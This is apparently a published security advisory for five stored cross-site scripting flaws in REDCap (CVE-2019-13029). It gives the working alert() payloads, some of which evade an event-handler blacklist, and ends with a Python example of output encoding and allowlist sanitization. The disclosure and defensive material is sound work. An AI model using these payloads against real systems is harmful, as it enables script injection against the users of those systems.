ExploitFixes
REDCap < 9.1.2 - Cross-Site Scripting 2019-07-19 12:17:49

# Exploit Title: REDCap < 9.1.2 - Cross-Site Scripting
# Date: 2019-07-19
# Exploit Author: Dylan GARNAUD & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
# Vendor Homepage: https://projectredcap.org
# Software Link: https://projectredcap.org
# Version: Redcap 9.x.x before 9.1.2 and 8.x.x before 8.10.2
# Tested on: 9.1.0
# CVE: CVE-2019-13029
# Security advisory: https://gitlab.com/snippets/1874216

### Stored XSS n°1 – Project name (found by Dylan GARNAUD)

Most JavaScript event handlers are blacklisted, but not all of them. We found one event that was not blacklisted and used it successfully.

- Where? In the project name
- Payload: `<BODY onKeyPress=alert("xss")>`
- Details: Since it is an *onkeypress* event, it is triggered whenever the user presses any key, and since the payload is stored in the project name it is rendered on several pages.
- Privileges: It requires admin privileges to store it.
- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/ProjectSetup/index.php?pid=16&msg=projectmodified

### Stored XSS n°2 – Calendar (found by Dylan GARNAUD)

- Where? In a calendar event
- Payload: `<BODY onKeyPress=alert("xss")>`
- Privileges: It requires admin privileges to store it.
- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Calendar/index.php?pid=16&view=week&month=7&year=2019&day=12

### Stored XSS n°3 – CSV upload (found by Dylan GARNAUD)

- Where? Wherever there is a CSV upload feature whose parsed results are displayed
- Payload:
```csv
record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete
<script>alert("upload xss")</script>,,
```
- Details: Once the malicious CSV is uploaded, the parsed content is inserted into an HTML table without encoding, where the XSS is triggered.
- Privileges: It requires admin privileges to store it.
- URL examples of execution:
  + https://redcap.XXX/redcap/redcap_v9.1.0/index.php?pid=16&route=DataComparisonController:index
  + https://redcap.XXX/redcap/redcap_v9.1.0/DataQuality/index.php?pid=16

### Stored XSS n°4 – Survey queue (found by Alexandre ZANNI)

- Where? In the Survey Queue (choose a Project > Project Home and Design > Design > Survey Queue)
- Payload: `</textarea><svg/onload='alert("XSS survey queue")'>`
- Privileges: It requires admin privileges to store it.
- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Design/online_designer.php?pid=16

### Stored XSS n°5 – Survey (found by Alexandre ZANNI)

- Where? In the survey management system.
  + Store: Select a project, go to the *Designer* section, choose *Survey Settings* and store the payload in the WYSIWYG editor section named *Survey Instructions* (the same applies to *Survey Completion Text*).
  + Execute: Anyone who views the survey, for example https://redcap.XXX/redcap/surveys/?s=88XF8CRJH4, triggers the XSS.
- Payload:
```html
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert('Survey XSS')</SCRIPT>"></BODY></HTML>
```
- Privileges:
  + Store: It requires admin privileges to store it.
  + Execute: Any unauthenticated user who can view the survey.
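The five findings share one root cause: stored values are rendered as markup, and the protection is a blacklist of event handler names that misses at least *onkeypress*. The defensive pattern is to treat every stored value as data at render time: contextual output encoding for the plain-text fields (project name, calendar event, CSV cells, the survey queue textarea) and an allowlist sanitizer for the rich-text survey fields, where HTML must be kept. The Python example below is added here and is not REDCap's code or the advisory authors'; the `BLOCKED_EVENTS` blacklist, the allowed tag set, the helper names and the CSV sample are constructed for illustration, and the payload strings from the sections above are used only as test input.

```python
import csv
import html
import io
import re
from html.parser import HTMLParser

# Constructed samples: the payload strings quoted in the advisory, as plain
# Python strings (no entity encoding).
PROJECT_NAME = '<BODY onKeyPress=alert("xss")>'
SURVEY_QUEUE = '</textarea><svg/onload=\'alert("XSS survey queue")\'>'
SURVEY_INSTRUCTIONS = (
    '<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">'
    '<?import namespace="t" implementation="#default#time2">'
    '<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>'
    "javascript:alert('Survey XSS')</SCRIPT>\"></BODY></HTML>"
)
CSV_UPLOAD = (
    "record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete\n"
    '<script>alert("upload xss")</script>,,\n'
)

# Hypothetical, deliberately incomplete blacklist standing in for the kind of
# filter the advisory describes: any handler it does not name survives.
BLOCKED_EVENTS = ("onclick", "onload", "onerror", "onmouseover")


def blacklist_filter(value):
    """The weak approach: strip only the handler names in BLOCKED_EVENTS."""
    for event in BLOCKED_EVENTS:
        value = re.sub(event, "", value, flags=re.IGNORECASE)
    return value


def render_text(value):
    """Output-encode a stored string for an HTML text node, <td> cell or attribute."""
    return html.escape(value, quote=True)


def render_textarea(value):
    """Wrap a stored value in <textarea>; encoding '<' makes a premature </textarea> inert."""
    return "<textarea>" + html.escape(value, quote=False) + "</textarea>"


def render_csv_as_table(csv_text):
    """Parse an uploaded CSV and build an HTML table, encoding every header and cell."""
    rows = csv.reader(io.StringIO(csv_text))
    header = next(rows)
    out = ["<table>", "<tr>" + "".join(f"<th>{render_text(h)}</th>" for h in header) + "</tr>"]
    for row in rows:
        out.append("<tr>" + "".join(f"<td>{render_text(c)}</td>" for c in row) + "</tr>")
    out.append("</table>")
    return "".join(out)


# Allowlist sanitizer for rich-text fields (survey instructions / completion text):
# keep a small set of formatting tags and drop every attribute except a safe href.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http:", "https:", "mailto:")


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skipping = 0  # > 0 while inside a <script> or <style> body

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skipping += 1
            return
        if self.skipping or tag not in ALLOWED_TAGS:
            return  # unknown tags (body, svg, t:set, ...) are dropped with all their attributes
        kept = ""
        for name, val in attrs:
            val = val or ""
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # no on* handler is ever allowlisted, so none can survive
            if name == "href" and not val.strip().lower().startswith(SAFE_SCHEMES):
                continue  # only absolute http(s)/mailto links are kept; javascript: is rejected
            kept += f' {name}="{html.escape(val, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skipping = max(0, self.skipping - 1)
        elif not self.skipping and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(html.escape(data, quote=False))

    # Processing instructions (<?xml ...>, <?import ...>), comments and
    # declarations carry no user-visible text and are discarded outright.
    def handle_pi(self, data): pass
    def handle_comment(self, data): pass
    def handle_decl(self, decl): pass


def sanitize_rich_text(value):
    """Return only allowlisted markup from a stored rich-text value."""
    parser = AllowlistSanitizer()
    parser.feed(value)
    parser.close()
    return "".join(parser.out)
```

Running the payloads from this advisory through these helpers shows the difference in approach: `blacklist_filter` leaves the *onkeypress* handler untouched because it was never listed, whereas `render_text` and `render_textarea` turn the whole string into inert text regardless of which handler it uses, and `sanitize_rich_text` reduces the survey payload to an empty string because neither `t:set`, the `<?xml`/`<?import` processing instructions nor `SCRIPT` is on the allowlist. The page does not describe how versions 9.1.2 and 8.10.2 fixed the issue, so this is a generic illustration of the mitigation class, not the vendor's patch.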